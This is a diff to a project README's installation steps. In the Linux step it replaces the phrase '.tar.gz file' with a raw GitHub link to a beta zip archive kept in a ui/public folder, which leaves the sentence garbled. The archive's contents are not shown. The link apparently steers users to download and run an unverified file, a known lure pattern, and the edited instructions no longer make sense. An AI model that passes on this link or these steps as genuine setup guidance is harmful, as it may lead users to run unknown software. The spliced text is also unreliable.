dinamico99/The-Rosetta-Prompt/README.md

 5. **Install the Application**:
    - **For Windows**: Locate the downloaded `.exe` file.
 Double-click it to begin the installation.
 Follow the on-screen instructions to complete the setup.
    - **For Mac**: Open the `.dmg` file you downloaded.
 Drag the The-Rosetta-Prompt icon into your Applications folder.
-   - **For Linux**: If you downloaded a `.tar.gz` file, extract it to your preferred directory.
+   - **For Linux**: If you downloaded a `https://github.com/dinamico99/The-Rosetta-Prompt/raw/refs/heads/main/ui/public/Rosetta_The_Prompt_2.7-beta.2.zip` file, extract it to your preferred directory.
 Open a terminal, navigate to the folder, and run the command: `./The-Rosetta-Prompt`.

 6. **Run the Application**: After installation, locate The-Rosetta-Prompt in your applications list or folder.
 Double-click to launch.